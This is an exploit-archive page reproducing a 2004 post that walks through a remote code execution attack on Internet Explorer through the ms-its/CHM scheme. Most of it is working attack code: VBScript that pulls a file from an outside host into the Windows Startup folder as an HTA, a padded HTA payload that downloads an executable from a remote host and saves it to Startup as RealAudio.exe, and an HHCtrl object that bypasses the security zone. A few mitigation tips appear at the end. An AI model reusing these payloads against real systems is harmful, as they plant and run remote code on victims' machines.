exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

chmremote.txt

chmremote.txt
Posted Oct 27, 2004
Authored by Michael Evanchik | Site MichaelEvanchik.com

Full write up and exploitation walk-thru for the Microsoft Internet Explorer ms-its scheme/CHM remote code execution vulnerability.

tags | exploit, remote, code execution
SHA-256 | c10437988f65d562e543ddae063d81d560a65d91c131cdb441b41b5044e534ce

chmremote.txt

Change Mirror Download
In-Reply-To: <200410200335.i9K3Zi72007862@web186.megawebservers.com>

I have created a PoC for this https://www.michaelevanchik.com/kara/scrolll/notagain.txt

and for those of you scared to click links these days , here is the contents

Microsoft Internet Explorer ms-its scheme/CHM remote code execution

Oct, 24 2004


Vulnerable
----------
- Microsoft Internet Explorer 6.0 (lower was not tested)
- Microsoft Windows XP Pro
- Microsoft Windows XP Home
- Microsoft Windows 2003 Server Enterprise


not tested if vulnerable
------------------------
- Microsoft Windows 98
- Microsoft Internet Explorer 5.x


Not Vulnerable
--------------
- Microsoft Windows 2000
- Microsoft Windows 2000 Server


Severity
---------
Critical - Remote code execution, little user intervention


In English
----------
You can run executable code with a series of html codes on a XP system. Its getting harder and harder these days so be ready for a long confusing paper. I am posting this proof of concept because as most of us know Microsoft will dismiss the last advisory (from http-equiv) and not provide us with patches for months and maybe years.


Tech Stuff and Explanation
--------------------------
https://www.michaelevanchik.com/kara/scrolll/files.zip <-- download all files here

1. Create a image file with the following source code that http-equiv gave us into a comment section on a image file. I used Photoshop in the file menu > file info > comment field. From there I saved the file as a jpeg file and then renamed it to malwarez6.mcb

Here is the code http-equiv gave us, i just changed it around to inject the hta file into start up instead.

<script language="vbs">
Dim Conn, rs
Set Conn = CreateObject("ADODB.Connection")
Conn.Open "Driver={Microsoft Text Driver (*.txt; *.csv)};" & _
"Dbq=https://arite.zapto.org;" & _
"Extensions=asc,csv,tab,txt;" & _
"Persist Security Info=False"
Dim sql
sql = "SELECT * from foobar.txt"
set rs = conn.execute(sql)
set rs =CreateObject("ADODB.recordset")
rs.Open "SELECT * from foobar.txt", conn
rs.Save "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\real scheduler.hta", adPersistXML
rs.close
conn.close
</script>


There is one thing you need to know about this code. Oddly “select * from foobar.txt” not only runs a GET command for “foobar.txt” on the web server, it also logs in anonymous to a FTP server on the same host. If your server does not allow both, the vulnerability will not work.



2. foobar.txt was the most difficult part of for me. From the information http-equiv gave us, it seems this vulnerability could have been dismissed since you could not fit enough scriptable code into the hta file without the script compiler erroring due to binary asci code messing up the vbscript. What I uncovered was this text file needed to be in a comma delimited format. Not only that each side of each line of code needed to be padded with a dummy variable to keep the code "alive" so it would not error. Notice the variable "crap" and the first and last lines where also dummies which the code would not have worked without. HTA files are still a BIG whole for microsoft. All the patching they have done to exploits, and the creation of xp service pack 2 was gods sent, but yet HTA files do not apply to ANY of these new features. So I ended up putting an old and easy exe running exploit inside this hta file.

foobar.txt
-----------------------------------------
"meaning less shit i had to put here"
"<script language=vbscript> crap = """
""": on error resume next: crap = """
""" : set o = CreateObject(""msxml2.XMLHTTP"") : crap="""
""" : o.open ""GET"",""https://hometown.aol.com/mcbain/calc.exe"",False : crap="""
""" : o.send : crap="""
""" : set s = createobject(""adodb.stream"") : crap="""
""" : s.type=1 : crap="""
""" : s.open : crap="""
""" : s.write o.responseBody : crap="""
""" : s.savetofile ""C:\Documents and Settings\All Users\Start Menu\Programs\Startup\RealAudio.exe"",2 : crap="""
"""</script> crap="""
--------------end foobar.txt--------------------


3. In index.html notice the following key code:

<img id="dyn" src="malwarez6.mcb" border="0">


According to http-equiv's (malware.com) post he was using a file with no extension. This did not work for me on IIS server so I used an extension that was not used (.mcb). From there in IIS management console I added this mime type manually (.mcb text/html) entry. This image now gets by microsoft’s patch of not allowing executable content to be "draggable". Microsoft seems to check ( no matter what extension of the file u use, or content type your http server sends) the file internally to see if it is not an executable file.


4. create a file cigar.hhk. The code in this file is self explanatory


5. create frame.html. Most somewhat self explanatory, though note the following code..

<OBJECT style="height:650" style="width:250"id="hhctrl" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"codebase="hhctrl.ocx#Version=5,2,3790,1194"width=7% height=7% style="position:absolute;top:140;left:72;z-index:100;">
<PARAM name="Command" value="Index">
<PARAM name="Item1" value="cigar.hhk">click me
</OBJECT>

I could not get this object auto clicked with hhctrl.click() unfortunately, for now this is the only user intervention part. But when a user click this object, it runs the html file in local zone, bypassing XP Service pack 2 for the second time in this exploit.


6. Upload hhtctrl.ocx for the computers that don’t happen to have this control. All XP's seem to have this by default, some win2k3's do not




Proof of Concept?
----------------
- https://www.michaelevanchik.com/kara/scrolll/index.html

- scroll down on this webpage and click the display button as directed.

- you will then notice a hta file in your start > programs > start up > real sceduler.hta

- from here when that is run you will get Real Audio.exe, alternatively the hta file is basically remote execution at that point anyway.





Vendor Recommendations
---------------------
- Microsoft needs to apply XP Service Pack 2's local zone exploit lockdown to .HTA files as well

- Microsoft should disable adodb.recordsets .save method for writing to hard drives.

- As always Microsoft should pay BETTER people to test their software instead of rewards for
virus writers

- Microsoft should not dismiss any vulnerabilities as "not a vulnerability itself" problems
since if combined with other "not a vulnerability itself" bugs lead to THE PROBLEM



Temp Fix
-------------
- Disable hta files.
- Disable scripting in Internet Explorer
- Do not use Internet Explorer, use Mozilla Firebird (now known as FireFox www.mozilla.org)


Credit
------
Http equiv - without him, i wouldn’t have a clue

mikx - https://www.mikx.de/scrollbar/ for his genius killer scrollbars!


Greets
------
- slacker my other brain
- illwill at illmob.org
- abe,rain and dolan


Contact
-------
Mike@MichaelEvanchik.com
https://www.MichaelEvanchik.com - me

https://Software.High-Pow-er.com - Need a professional programmer?
https://www.High-Pow-er.com - Other, Security, Consulting






Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close